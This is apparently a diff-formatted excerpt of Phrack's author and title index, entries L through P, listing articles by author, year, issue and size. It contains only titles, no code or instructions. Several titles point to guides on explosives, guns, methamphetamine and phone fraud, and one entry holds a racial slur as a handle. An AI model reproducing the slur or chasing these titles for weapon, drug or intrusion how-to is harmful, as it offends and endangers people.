+"Key Trap v1.0 Keyboard Key Logger" by Dcypher. 1994. I46 F26 35k
+"Keytrap Revisisted" by Sendai. 1996. I48 F12 13k
+Killer Smurf authored
+        "Making Free Local Payfone Calls" 1987. I15 F3 7k
+King Arthur authored
+        "COSMOS: COmputer System for Mainframe OperationS (Part One)" 1989.
+         I26 F5
+        "COSMOS: COmputer System for Mainframe OperationS (Part Two)" 1989.    
+         I27 F5
+Knight Lightning authored
+        "DMS-100" 1986. I5 F5 8k
+        "Foundations on The Horizon; Chapter Two of FTSaga" 1989. I23 F5 27k
+        "Frontiers; Chapter Four of FTSaga" 1989. I24 F4 25k
+        Introduction/Index for I14 F1
+        Introduction/Index (co-authored) for I20-30,33  F1
+        "Introduction to The Internet Protocols II: Chapter Eight of The FTS"
+         1989. I28 F3 39k
+        "Introduction to The Internet Protocols II: Chapter Nine of The FTS"
+         1989. I29 F3 43k
+        "Introduction to MIDNET: Chapter Seven of The FTS" by Knight Lightning.
+         1989. I27 F3 35k
+        "Introduction to PBX's" 1986. I3 F9 7k
+        "Introduction to Videoconferencing" 1986. I9 F8 11k
+        "The Judas Contract (Part 2 of The Vicious Circle Trilogy)" 1988.
+         I22 F3 26k
+        "Limbo to Infinity; Chapter Three of FTSaga" 1989. I24 F3 18k
+        "MCI International Cards" 1985. I1 F5 3k
+        "MCI Overview" 1985. I2 F7 15k
+        "NSFnet: National Science Foundation Network" 1989. I26 F4 10k
+        "Phrack Pro-Phile on Groups" 1986. I6 F2 14k
+        "Phrack Pro-Phile on Karl Marx" (co-authored) 1988. I22 F2 9k
+        "Phrack World News" 1985-90. I2 F9 I3 F10  I4 F9-11  I5 F10-12  I6 F9-13
+         I7 F8-10  I8 F8-9  I9 F10  I10 F8-9  I11 F11-12  I12 F10-11  I13 F10
+         I14 F8-9  I15 F6-7 (19,21k)  I19 F7  I20 F12  I23 F11-12  I24 F11-13
+         I25 F9 19k-11  I26 F9-11  I27 F10-12  I28 F9-12  I29 F10-12  I30 F11-12
+        "Phrack World News" (co-authored) I21 F10-11  I22 F9-12
+        "Phrack World News Special Edition II" 1988. I21 F9 78k
+        "Phrack World News Special Edition III (SummerCon '89)" 1989. I28 F8 31k
+        "Shadows of a Future Past (Part 1 of The Vicious Circle Trilogy)" 1988.
+         I21 F3
+        "SPAN: Space Physics Analysis Network" 1989. I25 F4 47k
+        "Standing up to Fight The Bells" 1992. I38 F10 27k
+        "Subdivisions (Part 3 of The Vicious Circle Trilogy)" 1989. I23 F3 17k
+        "A Trip to The NCSC" 1990. I32 F7 16k
+        "Utopia; Chapter One of FTSaga" 1989. I23 F4 20k
+   co-authored
+        "25th Anniversary Index" 1989. I25 F2 15k
+        "Network Management Center" 1988. I21 F6 13k
+        "Real Phreaker's Guide Vol. 2" 1987. I13 F2 5k
+        "Welcome to Metal Shop Private" 1988. I20 F4 37k
+"Knight Line I/Parts 1-3" by Doc Holiday. 1990. I32 F10 47k-12
+The Kurgan authored
+        "Hacking GTN" 1987. I16 F4 7k
+
+
+                                   ** L **
+
+
+"LATA Reference List" by Infinite Loop 1991 I33 F5 11k
+Larry Kollar authored
+        "Intro to Packet Radio" 1993. I44 F9 16k
+Laughing Gas co-authored
+        "Advanced Modem-Oriented BBS Security" 1991 I34 F9 11k
+The Leftist authored
+        "Bolt Bombs" 1986. I5 F6 3k
+        "Fun With Lighters" 1986. I6 F4 2k
+        "Simple Data Encryption or Digital Electronics 101" 1987. I11 F5 4k
+        "The Tried and True Home Production Method for Methamphetamine"
+         by The Leftist. 1986. I4 F8 7k
+"Legal Info" by Szechuan Death. 1994. I46 F9 13k
+Legion of Doom! (group)
+   authored 
+        "How We Got Rich Through Electronic Fund Transfer" 1989. I29 F7 11k
+        "LODCOM BBS Archive Info" 1993. I43 F18 24k
+        "LODCOM Sample Messages" 1993. I43 F19 52k
+        "LOD Communications BBS Archive Information" 1993. I44 F22 29k
+   co-authored
+        "Legion of Doom and The Occult" 1991 I36 F6 24k
+   compiled 
+        "Bank Information" 1989. I29 F6 12k
+"Legion of Doom and The Occult" by LOD and Demon Seed Elite. 1991 I36 F6 24k
+Leroy Donnelly authored
+        "Air Fone Frequencies" 1992. I39 F8 14k
+Lex Luthor authored
+        "How To Hack Blackjack Part I" 1993. I43 F9 52k
+        "How To Hack Blackjack Part II" 1993. I43 F10 50k
+Lex Luthor was Pro-Philed in 1992. I40 F3 36k
+"Lifting Ma Bell's Cloak of Secrecy" by VaxCat. 1989. I24 F9 25k
+"Limbo to Infinity; Chapter Three of FTSaga" by Knight Lightning. 1989.
+ I24 F3 18k
+"Line Noise Part I" by Phrack Staff. 1993. I43 F4 39k
+"Line Noise Part II" by Phrack Staff. 1993. I43 F5 43k
+"Line Noise Part I" by Phrack Staff. 1993. I44 F3 51k
+"Line Noise Part II" by Phrack Staff. 1993. I44 F4 35k
+"Line Noise Part I" by Phrack Staff. 1994. I45 F4 49k
+"Line Noise Part II" by Phrack Staff. 1994. I45 F5 50k
+"Line Noise Part III" by Phrack Staff. 1994. I45 F6 59k
+"Line Noise Part I" by Phrack Staff. 1994. I46 F3 61k
+"Line Noise Part II" by Phrack Staff. 1994. I46 F4 56k
+"Line Noise Part I" by Phrack Staff. 1995. I47 F2 52k
+"Line Noise Part II" by Phrack Staff. 1995. I47 F3 59k
+"Line Noise Part I" by Phrack Staff. 1996. I48 F3 63k
+"Line Noise Part II" by Phrack Staff. 1996. I48 F4 51k
+"Line Noise" by Phrack Staff. 1996. I49 F3 65k
+"Line Noise" by Various Sources. 1997. I50 F3 72k
+"Linux TTY hijacking" by Halflife. 1997. I50 F5 15k
+"A Little About Dialcom" by Herd Beast. 1994. I46 F14 29k
+
+LOCK PICKING
+   "How to Pick Master Locks" by Gin Fizz and Ninja NYC. 1985. I1 F6 2k
+
+"LODCOM BBS Archive Info" by LOD. 1993. I43 F18 24k
+"LOD Communications BBS Archive Information" by LOD. 1993. I44 F22 29k
+"LODCOM Sample Messages" by LOD. 1993. I43 F19 52k
+
+LONG DISTANCE CARRIERS
+   "Dun & Bradstreet Report on AT&T" submitted by Elric of Imrryr. 1988.
+      I17 F2 24k
+   "Dun & Bradstreet Report on Pacific Telesis" submitted by Elric of Imrryr.
+      1988. I17 F3 26k
+   "Lifting Ma Bell's Cloak of Secrecy" by VaxCat. 1989. I24 F9 25k
+   "MCI International Cards" by Knight Lightning. 1985. I1 F5 3k
+   "MCI Overview" by Knight Lightning. 1985. I2 F7 15k
+   "OTher Common Carriers; A List" by Equal Axis. 1989. I28 F7 8k
+   "Profile of MAX Long Distance Service" by Phantom Phreaker. 1986. I4 F4 4k
+   "The TMC Primer" by Cap'n Crax. 1987. I10 F3 6k
+
+"Looking Around in DECnet" by Deep Thought. 1989. I27 F6 14k
+"Loop Maintenance Operating System" by Control C. 1988. I18 F8 32k
+"Loop Maintenance Operations System" by Phantom Phreaker and Doom Prophet.
+ 1986. I9 F9 17k
+Lord Digital co-authored
+        "*ELITE* Access" 1991. I36 F5 43k
+        "Phrack Pro-Phile on Lord Digital" 1992. I42 F3 22k
+Lord Digital was Pro-Philed in 1992. I42 F3 22k
+Lotus co-authored 
+        "CompuServe Info" 1986. I8 F6 8k
+
+
+                                   ** M **
+
+
+The Mad Phone-Man authored
+        "BELLCORE Information" 1987. I16 F2 11k
+        "Flight of The Mad Phone-Man" (PWN) 1987. I16 F10 2k
+        "The Mad Phone-Man and The Gestapo" (PWN) 1987. I16 F9 2k
+Mad Hacker 616 authored 
+        "The Art of Junction Box Modeming" I8 F5 6k
+Madjus (N.O.D.) authored
+        "Cellular Info" 1993. I43 F17 47k
+Magic Hasan authored
+        "Primos: Primenet, RJE, DPTX" 1988. I18 F4 15k
+"Making Free Local Payfone Calls" by Killer Smurf. 1987. I15 F3 7k
+"The Making of a Hacker" by Framstag. 1989. I27 F7 9k
+"Making Shell Bombs" by Man-Tooth. 1986. I3 F3 3k
+"Mall Cop Frequencies" by Caligula XXI. 1992. I41 F10 11k
+Maldoror authored
+        "The Universal Data Convertor" 1994. I45 F21 45k
+   co-authored
+        "Gettin' Down 'N Dirty Wit Da GS/1" 1994. I46 25k       
+Man-Tooth authored
+        "Homemade Guns" 1985. I2 F3 7k
+        "Making Shell Bombs" 1986. I3 F3 3k
+Manny E. Farber authored
+        "10th Chaos Computer Congress" 1994. I45 F13 23k
+Mastermind authored
+        "SS7 Diverter plans" 1997. I50 F9 27k        
+Max Nomad authored
+        "Prack World News Special Report VI on CFP-2" 1992. I38 F12 18k
+"MCI International Cards" by Knight Lightning. 1985. I1 F5 3k
+"MCI Overview" by Knight Lightning. 1985. I2 F7 15k
+"The MCX7700 PABX System" by Dr. Delam. 1994. I45 F25 22k
+Men From Mongo authored
+        "Real Cyberpunks" 1991 I36 F9 13k
+The Mentor authored
+        "The Conscience of a Hacker {Reprint}" by The Mentor. 1987. I14 F3 4k
+        "Crashing DEC-10's" 1986. I4 F6 5k
+        "DCL Utilities for VMS Hackers" 1988. I19 F2 23k
+        "Fun With Automatic Tellers" by The Mentor. 1986. I8 F7 7k
+        "Hacker's Manifesto" 1986. I7 F3 4k
+        "Multi-User Chat Program for DEC-10's" (co-authored) 1986. I9 F7 7k
+        "A Novice's Guide to Hacking (1989. Edition)" 1988. I22 F4 42k
+        "Metal/General Disussion [from Metal Shop Private BBS]" 1988. I20 F5 66k
+Mind Mage co-authored
+        "Phrack Loopback" 1992. I40 F2 50k
+        "Phrack Loopback" 1992. I41 F2 52k
+Minor Threat was Pro-Philed in 1994. I46 F5 12k
+"Mobile Tele Communications" by Phantom Phreaker. 1986. I5 F9 11k
+"MOD Family Portrait" <unencoded .gif> 1993. I44 F24 35k
+"The Moeller Papers" by Professor Moeller. 1993. I44 F10 30k
+Monty Python authored 
+        "Rolm Systems" 1985. I3 F2 11k 
+"More Stupid Unix Tricks" by Shooting Shark. 1987. I15 F2 10k
+Morgoth co-authored 
+        "CompuServe Info" 1986. I8 F6 8k
+"Motorola Command Mode Information" by Cherokee. 1996. I48 F6 38k
+mrnobody authored
+        "DCO Operating System" 1997. I50 F14 16k
+"DTMF signalling and decoding" by Mr. Blue. 1997. I50 F13 17k
+Mudge was Pro-Philed in 1996. I49 F4 8k
+"Multi-User Chat Program for DEC-10's" by TTY-Man and The Mentor. 1986.
+ I9 F7 7k
+"My Bust Part I" by Robert Clark. 1993. I43 F12 56k
+"My Bust Part II" by Robert Clark. 1993. I43 F13 55k
+Mycroft authored
+        "Wide Area Information Services" 1992. I38 F8 11k
+"The Myth and Reality About Eavesdropping" by Phone Phanatic. 1989. I29 F8 17k
+
+
+                                   ** N **
+
+
+"Nasty Unix Tricks" by Shooting Shark. 1986. I6 F5 4k
+"Netmon" by daemon9. 1996. I48 F15 21k
+Netta Gilboa authored
+        "HoHoCon" 1995. I47. F10 30k        
+"Network Management Center" by Knight Lightning and Taran King. 1988. I21 F6 13k
+"Network Miscellany" by Racketeer. 1992. I40 F4 32k
+"Network Miscellany" by Racketeer. 1992. I41 F4 35k
+"Network Miscellany" by Taran King. 1989. I28 F4 30k
+"Network Miscellany II" by Taran King. 1989. I29 F4 35k
+"Network Miscellany III" by Taran King. 1989. I30 F2 21k
+"Network Miscellany IV" by Datastream Cowboy. 1992. I38 F5 30k
+"Network Miscellany V" by Datastream Cowboy. 1992. I39 F4 34k
+"Network Progression" by Dedicated Link. 1989. I24 F10 5k
+"The New Editors<daemon9, ReDragon, Voyager> were Pro-Philed in 1996. I48 F5 23k
+"New Users [from Metal Shop Private BBS]" 1988. I20 F9 17k
+Night Ranger authored
+        "Hacking Voice Mail Systems" 1991. I34 F5 19k
+The Nightstalker authored 
+        "Phrack Editorial on Microbashing" 1988. I19 F6 6k
+Nihil authored
+        "Cracking NT Passwords" 1997. I50 F8 17k
+Ninja Master authored
+        "Phreaking in Germany" 1991. I33 F7 28k
+Ninja NYC co-authored 
+        "How to Pick Master Locks" 1985. I1 F6 2k
+"Nitrogen-Trioxide Explosive" by Signal Substain. 1988. I17 F4 7k
+NOD authored
+        "Users Guide to XRAY" 1992. I42 F6 11k
+The Noid authored
+        "The Blue Box and Ma Bell" 1989. I25 F7 19k
+"Non-Published Numbers" by Patrick Townsend. 1988. I21 F7 8k
+"NorThern Telecom's FMT-150B/C/D" by FyberLyte. 1993. I44 F13 16k
+"NorThern Telecom's SL-1" by Iceman. 1993. I44 F19 30k
+The Not authored
+        "TCP/IP: A Tutorial Part 1 of 2" 1991. I33 F8 28k
+        "TCP/IP: A Tutorial Part 2 of 2" 1991. I34 F8 39k
+"No Time for Goodbyes" by Emmanuel Goldstein. 1994. I45 F9 21k
+
+NOVELL NETWORKS
+        "Help for Verifying Novell Security" by Phrack Staff. 1993. I43 F11 48k
+
+"A Novice's Guide to Hacking (1989. Edition)" by The Mentor. 1988. I22 F4 42k
+"NSFnet: National Science Foundation Network" by Knight Lightning. 1989.
+ I26 F4
+"NUA List for Datex-P and X.25 Networks" by Oberdaemon. 1989. I27 F4 105k
+
+
+                                   ** O **
+
+
+Oberdaemon authored 
+        "NUA List for Datex-P and X.25 Networks" 1989. I27 F4 105k
+The Omega co-authored        
+        "Exploring Information-America" 1992. I37 F4 51k
+        "Quentin Strikes Again" 1994. I45 F12 28k
+"The Open Barn Door" by Douglas Walter(Newsweek). 1992. I39 F9 11k
+"Operating The VM/SP CP" by Taran King. 1989. I27 F2 38k
+Opticon authored
+        "An Introduction to The DecServer 200" 1993. I44 F22 16k
+Optik Nerve authored
+        "Introduction to Octel's ASPEN" 1994. I45 F23 12k
+Oryan Quest authored
+        "Fun With The Centagram VMS Network" 1986. I9 F3 4k
+"OTher Common Carriers; A List" by Equal Axis. 1989. I28 F7 8k
+Overlord authored 
+        "Private Audience" 1986. I3 F5 13k
+"An Overview of Pre-Paid Calling Cards" by Treason. 1995. I47 29k
+
+
+                                   ** P **
+
+
+"Packet Switched Network Security" by Chris Goggans. 1992. I42 F4 22k
+"PACT: Prefix Access Code Translator" by The Executioner. 1987. I11 F3 8k
+
+PAGERS
+   "The Wonderful World of Pagers" by Erik Bloodaxe. 1994. I46 F8     
+   "The Glenayre GL3000 Paging and Voice retrieval System" by Armitage. 1995.
+    I47 F14 25k   
+      
+"Paid Advertisement"(unencoded game) by R.E.M. 1994. I46 F6 62k
+"Paid Advertisement Part ][" (unencoded game) by R.E.M. 1994. I46 F7 45k
+Pain Hertz authored
+        "Inside The SYSUAF.DAT File" 1990. I32 F8 16k    
+        "Phrack Pro-Phile of Markus Hess" 1990. I31 F2 6k
+Parmaster authored
+        "Introduction to the FedLine software system" 1996. I49 F12 19k
+
+PARODY'S
+   "In Living Computer Starring Knight Lightning" 1991 I36 F3 10k
+   "The History ah MOD" by Wing Ding. 1991 I36 F4 23k
+
+Patrick Townsend authored 
+        "Non-Published Numbers" 1988. I21 F7 8k
+Paul Saffo authored 
+        "Consensual Realities in Cyberspace". 1989. I30 F8 11k
+
+PBXs
+   "AIS - Automatic Intercept System" by Taran King. 1987. I11 F6 16k
+   "Hacking Rolm's CBXII" by Doc Holiday. 1990. I31 F3 15k
+   "Introduction to Octel's ASPEN" by Optik Nerve. 1994. I45 F23 12k
+   "Introduction to PBX's" by Knight Lightning. 1986. I3 F9 7k
+   "The MCX7700 PABX System" by Dr. Delam. 1994. I45 F25 22k
+   "Physical Access and Theft of PBX Systems" by Co/Dec. 1993. I43 F15 28k
+   "SAM Security" by Spitfire Hacker. 1985. I1 F2 2k
+
+pbxFreak authored
+        "Skytel Paging and Voicemail" 1997. I50 F10 36k        
+"PC Application Level Security" by Sideshow Bob. 1997. I50 F12 21k
+Phantom Phreaker authored
+        "Busy Line Verification" 1987. I11 F10 10k
+        "Busy Line Verification Part II" 1987. I12 F8 9k
+        "Facility Assignment & Control Systems" 1988. I19 F5 11k
+        "Fortell Systems" 1986. I3 F6 3k
+        "Mobile Telephone Communications" 1986. I5 F9 11k
+        "Profile of MAX Long Distance Service" 1986. I4 F4 4k
+        "School/College Computer Dial-Ups" 1985. I1 F8 4k
+   co-authored
+        "Automatic Number Identification" (co-authored) 1987. I10 F7 9k
+        "Loop Maintenance Operations System" (co-authored) 1986. I9 F9 17k
+"Phone Bugging: Telecom's Underground Industry" by Split Decision. 1989.
+ I26 F7
+Phone Phanatic authored
+        "The Myth and The Reality About Eavesdropping" 1989. I29 F8 17k
+        "Western Union Telex, TWX, and Time Service" 1989.
+         I30 F10 13k
+Phrack Accident authored
+        "Playing Hide and Seek, Unix Style" 1993. I43 F14 31k
+"Phrack Classic Spotlight featuring Knight Lightning" by Crimson Death. 1990.
+ I32 F2
+"Phrack Editorial on Microbashing" by The Nightstalker. 1988. I19 F6 6k
+Phrack Inc. authored 
+        "Internet Domains: FTSaga Appendix 3 (Limbo to Infinity)"
+         1989. I26 F8 20k
+"Phrack Inc./Gossip [from Metal Shop Private BBS]" 1988. I20 F6 56k
+"Phrack Loopback" by Phrack Staff. 1991. I34 F2 14k
+"Phrack Loopback" by Phrack Staff. 1991. I35 F2 34k
+"Phrack Loopback" by Phrack Staff. 1992. I37 F2 15k
+"Phrack Loopback" by Phrack Staff. 1992. I38 F2 12k
+"Phrack Loopback" by Phrack Staff. 1992. I39 F2 24k
+"Phrack Loopback" by Dispater & Mind Mage. 1992. I40 F2 50k
+"Phrack Loopback" by Dispater & Mind Mage. 1992. I41 F2 52k
+"Phrack Loopback" by Phrack Staff. 1992. I42 F2 48k
+"Phrack Loopback Part I" by Phrack Staff. 1993. I43 F2 38k
+"Phrack Loopback Part II" by Phrack Staff. 1993. I43 F3 44k
+"Phrack Loopback/Editorial" by Phrack Staff. 1993. I44 F2 57k
+"Phrack Loopback Part I" by Phrack Staff. 1994. I45 F2 31k
+"Phrack Loopback Part II" by Phrack Staff. 1994. I45 F3 40k
+"Phrack Loopback/Editorial" by Phrack Staff. 1994. I46 F2 52k
+"Phrack Loopback/Editorial" by Phrack Staff. 1995. I47 F2 52k
+"Phrack Loopback/Editorial" by Phrack Staff. 1996. I48 F2 55k
+"Phrack Loopback/Editorial" by Phrack Staff. 1996. I49 F2 6k
+"Phrack Loopback/Editorial" by Phrack Staff. 1997. I50 F2 60k
+Phrack Staff authored
+        "extract.c" 1997. I50 F16 2k
+        "Diet Phrack Loopback" 1991 I36 F2 14k
+        "Line Noise Part I" 1993. I43 F4 39k
+        "Line Noise Part II" 1993. I43 F5 43k
+        "Line Noise Part I" 1993. I44 F3 51k
+        "Line Noise Part II" 1993. I44 F4 35k
+        "Line Noise Part I" 1994. I45 F4 49k
+        "Line Noise Part II" 1994. I45 F5 50k
+        "Line Noise Part III" 1994. I45 F6 59k
+        "Line Noise Part I" 1994. I46 F3 61k
+        "Line Noise Part II" 1994. I46 F4 56k
+        "Line Noise Part I" 1994. I47 F2 59k
+        "Line Noise Part II" 1994. I47 F3 65k
+        "Line Noise Part I" 1996. I48 F3 63k
+        "Line Noise Part II" 1996. I48 F4 51k
+        "Line Noise" 1996. I49 F3 65k
+        "Phrack Loopback" 1991. I34 F2 14k
+        "Phrack Loopback" 1991. I35 F2 34k
+        "Phrack Loopback" 1992. I37 F2 15k
+        "Phrack Loopback" 1992. I38 F2 12k
+        "Phrack Loopback" 1992. I39 F2 24k
+        "Phrack Loopback" 1992. I42 F2 48k
+        "Phrack Loopback Part I" 1993. I43 F2 38k
+        "Phrack Loopback Part II" 1993. I43 F3 44k
+        "Phrack Loopback/Editorial" 1993. I44 F2 57k
+        "Phrack Loopback Part I" 1994. I45 F2 31k
+        "Phrack Loopback Part II" 1994. I45 F3 40k
+        "Phrack Loopback/Editorial" 1994. I46 F2 52k
+        "Phrack Loopback/Editorial" 1995. I47 F2 52k
+        "Phrack Loopback/Editorial" 1996. I48 F2 55k
+        "Phrack Loopback/Editorial" 1996. I49 F2 6k
+        "Phrack Loopback/Editorial" 1997. I50 F2 60k
+        "Phrack Pro-Phile on Aleph1" 1997. I50 F4 7k
+        "Phrack Pro-Phile on Docter Who" 1993. I43 F6 15k
+        "Phrack Pro-Phile on Mudge" 1996. I49 F4 8k
+        "Phrack Pro-Phile on The New Editors"<daemon9,ReDragon,Voyager> 1996.
+         I48 F5 23k
+        "The Phrack University Dialup List" 1994. I46 F13 12k
+        "Help for Verifying Novell Security" 1993. I43 F11 48k
+"Phrack Pro-Phile [of/on/Featuring]
+   Agrajag The Prolonged" by Taran King. 1987. I12 F2 7k
+   Aleph1" by Phrack Staff. 1997. I50 F4 7k
+   Aristotle" by Dispater. 1992 I38 F3 6k
+   Ax Murderer" by Crimson Death. 1988. I18 F2 4k
+   Broadway Hacker" by Taran King. 1986. I5 F2 5k
+   Chanda Lier" by Taran King. 1989. I24 F2 6k
+   Chris Goggans" by S. Leonardo Spitz. 1991. I35 F3 20k
+   Crimson Death" by Taran King. 1986. I4 F1
+   Computer Cop" by The Grimace. 1993. I44 F5 22k 
+   Control C" by Phrack Staff. 1994. I45 F7 22k
+   daemon9" by Phrack Staff. 1996. I48 F5 23k
+   Dave Starr" by Taran King. 1987. I10 F2 8k
+   Disk Jockey" by The Disk Jockey and & Dispater. 1991 I34 F3 23k
+   Docter Who" by Phrack Staff. 1993 I43 F6 15k
+   Emmanuel Goldstein" by Taran King. 1989. I29 F2 16k
+   Erik Bloodaxe" by Taran King. 1989. I28 F2 15k
+   Groups" by Knight Lightning. 1986. I6 F2 14k
+   Karl Marx" by Taran King and Knight Lightning. 1988. I22 F2 9k
+   Lex Luthor" by Taran King. 1992. I40 F3 36k
+   Lord Digital" by Lord Digital. 1992 I42 F3 22k
+   Markus Hess" by Pain Hertz. 1990. I31 F2 6k
+   The Mentor" by Taran King. 1989. I23 F2 7k
+   Minor Threat" by Phrack Staff. 1994. I46 F5 12k
+   Modem Master" by Taran King. 1988. I21 F2 6k
+   Mudge" by Phrack Staff. 1996. I49 F4 8k
+   The Nightstalker" by Taran King. 1986. I9 F2 6k
+   ReDragon" by Phrack Staff. 1996. I48 F5 23k
+   Scan Man"" by Taran King. 1986. I7 F2 7k
+   Shadow Hawk 1" by Dispater. 1992 I39 F3 8k
+   Shooting Shark" by Crimson Death. 1991. I33 F2 16k
+   Supernigger" by Supernigger. 1992. I41 F3 10k
+   Taran King" by Taran King. 1988. I20 F2 14k
+   Terminus" by Taran King. 1987. I14 F2 7k
+   Tuc" by Taran King. 1986. I8 F2 6k
+   Wizard of Arpanet" by Taran King. 1987. I11 F2 7k
+   Voyager" by Phrack Staff. 1996. I48 F5 23k
+"The Phrack University Dialup List" by Phrack Staff. 1994. I46 F13 12k
+"Phrack World News" by alhambra. 1997. I50 F15 110k
+"Phrack World News" by Crimson Death. 1991 I33 F11 18k
+"Phrack World News" Parts 1-3 by Datastream Cowboy. 1992. I38 F13-15 34,32,33k
+"Phrack World News" Parts 1-4 by Datastream Cowboy. 1992. I39 F10-13 30,27,29,29k
+"Phrack World News" Parts 1-3 by Datastream Cowboy. 1992. I40 F12-14 50,48,48k
+"Phrack World News" Parts 1-3 by Datastream Cowboy. 1992. I41 F11-13 46,49,43k
+"Phrack World News" by Datastream Cowboy. 1992. I42 F14 29k
+"Phrack World News" by Datastream Cowboy. 1993. I43 F27 24k
+"Phrack World News" by Datastream Cowboy. 1993. I44 F27 22k
+"Phrack World News" by Datastream Cowboy. 1994. I45 F28 17k
+"Phrack World News" by Datastream Cowboy. 1994. I46 F28 38k
+"Phrack World News" by Datastream Cowboy. 1995. I47 F22 38k        
+"Phrack World News" by Datastream Cowboy. 1996. I48 F18 21k
+"Phrack World News" by Disorder. 1996. I49 F16 109k
+"Phrack World News" by Dispater. 1991. I33(F12,13  28/25k) I34 (F10/11 14/19k)  
+ I35(F10-13 27/31/34/27k)
+    co-authored
+        "Phrack World News" Part 1-4 1992 I37 F11-14 31,30,29,31k
+"Phrack World News" by Epsilon. 1988. I18 F10-11  I19 F8 6k
+"Phrack World News" by Knight Lightning. 1985-90. I2 F9 I3 F10  I4 F9-11
+   I5 F10-12  I6 F9-13  I7 F8-10  I8 F8-9  I9 F10  I10 F8-9  I11 F11-12
+   I12 F10-11  I13 F10  I14 F8-9  I15 F6-7  I19 F7  I20 F12  I23 F11-12
+   I24 F11-13  I25 F9 19k-11  I26 F9-11  I27 F10-12
+   I28 F9-12  I29 F10-12  I30 F11-12
+"Phrack World News" by Knight Lightning and Epsilon. 1988. I21 F10 22k-11
+"Phrack World News" by Knight Lightning and Taran King. 1988. I22 F9 25k-12
+"Phrack World News" by The Mad Phone-Man. 1987. I16 F9-10
+"Phrack World News" by Phreak_Accident. 1990. I31 F8-10 (13,17,40k)
+"Phrack World News" by Shooting Shark. 1987. I16 F11 2k
+"Phrack World News" by Sir Francis Drake. 1987-88. I15 F8  I17 F10
+"Phrack World News" by The $muggler. 1987-88. I16 F12, I17 F11
+"Phrack World News" by The Sorceress. 1988. I17 F12 8k
+"Phrack World News Special Edition #1" by Knight Lightning. 1987. I14 F7 32k
+"Phrack World News Special Edition II" by Knight Lightning. 1988. I21 F9 78k
+"Phrack World News Special Edition III (SummerCon '89)" by Knight Lightning.
+ 1989. I28 F8 31k
+"Phrack World News Special Edition IV" <CyberView '91) by Bruce Sterling 1991.
+ I33 F10 28k
+"Phrack World News Special Report VI on WeenieFest'92" by Count Zero 1992.
+ I37 F10 14k
+"Phrack World News Special Report VI on CFP-2" by Max Nomad. 1992. I38 F12 18k
+Phreak_Accident authored
+        "Phrack World News" 1990. I31 F8-10 (13,17,40k)
+        "TAMS & Telenet Security" 1990. I31 F4 7k
+        "Phreak/Hack Sub [from Metal Shop Private BBS]" 1988. I20 F7 46k
+
+PHREAKING
+(See also CELLULAR, COSMOS, ISDN, LONG DISTANCE CARRIERS, TELEPHONE SWITCHING,
+ PBX)
+   "The AT&T Mail Gateway" by Robert Alien. 1991. I34 F4 5k
+   "The Art of Junction Box Modeming" by Mad Hacker 616. I8 F5 6k
+   "Automatic Number Identification" by Phantom Phreaker and Doom Prophet.
+      I10 F7 9k
+   "Blocking of Long Distance Calls" by Jim Schmickley. 1988. I21 F8 26k
+   "Blocking of Long Distance Calls... Revisited" by Jim Schmickley. 1989.
+      I29 F9
+   "The Blue Box and Ma Bell" by The Noid. 1989. I25 F7 19k
+   "Box.exe for SoundBlasters"<unencoded> by The Fixer. 1994. I45 F22 13k
+   "Busy Line Verification" by Phantom Phreaker. 1987. I11 F10 10k
+   "Busy Line Verification Part II" by Phantom Phreaker. 1987. I12 F8 9k
+   "Can You Find Out If Your Telephone Is Tapped?" by Fred P. Graham and
+      VaxCat. 1989. I23 F9 20k
+   "Centrex Renaissance `The Regulations'" by Jester Sluggo. 1986. I4 F7 17k
+   "Circuit Switched Digital Capability" by The Executioner. 1987. I10 F5 12k
+   "City-Wide Centrex" by The Executioner. 1986. I8 F3 14k
+   "Computer-Based Systems for Bell System Operation" by Taran King. 1989.
+      I26 F2
+   "Control Office Administration of Enhanced 911 Service" by
+      The Eavesdropper. 1989. I24 F5 22k
+   "DCO Operating System" by mrnobody. 1997. I50 F14 16k
+   "DTMF signalling and decoding" by Mr. Blue. 1997. I50 F13 17k
+   "The Craft Acces Terminal" by Boss Hogg. 1996. I48 F8 36k
+   "Electronic Telephone Cards(Part 1)" by Stephane Bausson. 1996. I48 F10 39k
+   "Electronic Telephone Cards(Part 2)" by Stephane Bausson. 1996. I48 F11 66k
+   "The Fine Art of Telephony" by Crimson Flash. 1992 I40 F7 65k
+   "The Fone Phreak's Revenge" by Iron Soldier. 1985. I1 F4 4k
+   "Fortell Systems" by Phantom Phreaker. 1986. I3 F6 3k
+   "Glossary Terminology for Enhanced 911 Service" by The Eavesdropper. 1989.
+      I24 F6
+   "Guide to 5ESS" by Firm G.R.A.S.P.. 1993. I43 F17 63k
+   "A Guide to British Telecom's Caller ID Service" by Dr. BOB 1995.
+    I47 F19 31k
+   "How to Build a Paisley Box" by Thomas Covenant and Double Helix. 1987.
+      I13 F4 5k
+   "Information About NT's FMT-150/B/C/D" by Static. 1996. I48 F9 22k
+   "Introdcution to Telephony and PBX Systems" by Cavalier. 1996. I49 F5 100k
+   "International Toll Free Code list" by The Trunk Terminator 1991 I33 F6 15k
+   "LATA Reference List" by Infinite Loop 1991 I33 F5 11k
+   "Loop Maintenance Operating System" by Control C. 1988. I18 F8 32k
+   "Loop Maintenance Operations System" by Phantom Phreaker and Doom Prophet.
+      1986. I9 F9 17k
+   "Making Free Local Payfone Calls" by Killer Smurf. 1987. I15 F3 7k
+   "Mall Cop Frequencies" by Caligula XXI. 1992. I41 F10 11k
+   "An Overview of Pre-Paid Calling Cards" by Treason. 1995. I47 29k
+   "SS7 Diverter plans" by Mastermind. 1997. I50 F9 27k
+   "South Western Bell Lineman Word Codes" by Icon. 1997. I49 F11 18k
+   "NorThern Telecom's FMT-150B/C/D" by FyberLyte. 1993 I44 F13 16k
+   "Telenet/Sprintnet's PC Pursuit Outdial Directory" by Amadeus. 1991
+    I35 F4 90k
+   "Telephone Company Customer Applications" by Voyager. 1996. I49 F13 38k
+   "The Myth and The Reality About Eavesdropping" by Phone Phanatic. 1989.
+      I29 F8
+   "PACT: Prefix Access Code Translator" by The Executioner. 1987. I11 F3 8k
+   "Phreaking in Germany" by Ninja Master 1991 I33 F7 28k
+   "Prevention of The Billing Office Blues" by Forest Ranger. 1985. I2 F2 1k
+   "A Real Functioning PEARL BOX Schematic" by Dispater. 1989. I28 F5 5k
+   "A Real Functioning RED BOX Schematic" by J.R. "Bob" Dobbs. 1991. I33 F9 12k
+   "Real Phreaker's Guide Vol. 2" by Taran King and Knight Lightning. 1987.
+      I13 F2 5k
+   "The Reality of The Myth [REMOBS]" by Taran King. 1987. I14 F4 6k
+   "Special Area Codes" by >Unknown User<. 1989. I24 F8 27k
+   "Special Area Codes II" 1992. by Bill Huttig I39 F7 17k
